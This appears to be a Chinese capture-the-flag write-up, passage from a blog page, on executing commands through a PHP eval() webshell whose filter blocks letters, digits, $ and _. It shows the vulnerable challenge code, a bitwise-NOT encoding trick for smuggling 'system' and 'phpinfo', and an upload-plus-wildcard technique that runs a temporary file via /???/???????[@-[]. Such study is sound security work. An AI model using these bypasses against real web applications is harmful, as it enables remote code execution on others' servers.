无字母数字webshell命令执行

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

限制:

1.webshell长度不超过35

2.正则过滤掉了数字字母还有$和_

php7环境:

取反

php中'~'表示取反,而取反之后大都是不可见字符

<?php
var_dump(urlencode(~'system'));

取反后的值为%8C%86%8C%8B%9A%92

解码:

<?php
var_dump(urlencode(~'phpinfo'));

答案如下:

php5环境:

通配符

用通配符来进行匹配,无法准确匹配

但我们要继续通配符

[^a]表示这里不为a

[0-9]表示0-9这个范围

而注意到linux中文件基本都是小写,我们上传的文件中后几位是随机的,可能包含大写,所以我们就只需要利用[]表示出大写字母就可以了

在ascii表中,大写字母处于@-[之间,所以很明确了,使用/???/???????[@-[]来进行匹配

执行:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
   <form action="web.php" method="post" enctype="multipart/form-data">
        <input type="file" name="file" id="">
        <input type="submit" value="submit">
   </form>
</body>
</html>

写一个form表单上传文件到web.php,使用bp抓包,抓一个上传文件的包和web.php的包

把第一个包的post内容放入web.php中

发送请求

结束

相关推荐
Abladol-aj24 分钟前
并发和并行的基础知识
java·linux·windows
清水白石00824 分钟前
从一个“支付状态不一致“的bug,看大型分布式系统的“隐藏杀机“
java·数据库·bug
qq_3643717224 分钟前
Vue 内置组件 keep-alive 中 LRU 缓存淘汰策略和实现
前端·vue.js·缓存
HPC_fac1305206781626 分钟前
科研深度学习:如何精选GPU以优化服务器性能
服务器·人工智能·深度学习·神经网络·机器学习·数据挖掘·gpu算力
y先森1 小时前
CSS3中的弹性布局之侧轴的对齐方式
前端·css·css3
吾日三省吾码6 小时前
JVM 性能调优
java
y先森6 小时前
CSS3中的伸缩盒模型(弹性盒子、弹性布局)之伸缩容器、伸缩项目、主轴方向、主轴换行方式、复合属性flex-flow
前端·css·css3
前端Hardy6 小时前
纯HTML&CSS实现3D旋转地球
前端·javascript·css·3d·html
susu10830189116 小时前
vue3中父div设置display flex,2个子div重叠
前端·javascript·vue.js
弗拉唐7 小时前
springBoot,mp,ssm整合案例
java·spring boot·mybatis